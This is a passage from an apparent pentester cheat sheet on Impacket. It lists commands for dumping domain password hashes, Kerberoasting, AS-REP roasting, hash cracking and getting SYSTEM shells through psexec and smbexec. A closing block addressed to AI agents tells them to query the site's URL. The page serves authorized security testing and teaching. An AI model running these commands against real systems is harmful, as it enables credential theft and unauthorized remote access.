# Impacket

> Impacket is a collection of Python classes for working with network protocols.

* [GitHub - SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket)
* [Fun with network protocols, using Python and Impacket | Andrea Fortuna](https://www.andreafortuna.org/2018/06/18/fun-with-network-protocols-using-python-and-impacket/)

## Related

* [Active Directoy](/the-pentesters-cheat-sheet/services/misc/active-directoy.md)
* [TCP 88: Kerberos](/the-pentesters-cheat-sheet/services/tcp/tcp-88-kerberos.md)
* [TCP 389, 636, 3268, 3269: LDAP](/the-pentesters-cheat-sheet/services/tcp/tcp-389-636-3268-3269-ldap.md)

## Dump hashes

```powershell
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
```

## Users

> This script will gather data about the domain’s users and their corresponding email addresses.

```powershell
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
```

> This example will try to find and fetch Service Principal Names that are associated with normal user accounts.

```powershell
GetUserSPNs.py -request <domain>/<user>:<pw> // -dc-ip <ip> 
```

-> Crack hash e.g. using hashcat, to obtain passwords

> An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.

```powershell
samrdump.py <domain>
```

> This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF\_DONT\_REQUIRE\_PREAUTH). Output is compatible with JtR.

```powershell
GetNPUsers.py <domain>/<user> -no-pass
```

-> Crack hash e.g. using hashcat

## Shell (psexec.py)

> PSEXEC like functionality example using RemComSvc.\
> -> Get a shell as "nt authority\system"

```powershell
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>
```

## SMB (smbexec.py)

```powershell
sudo smbexec.py <user>:<pw>@<target>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/impacket.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.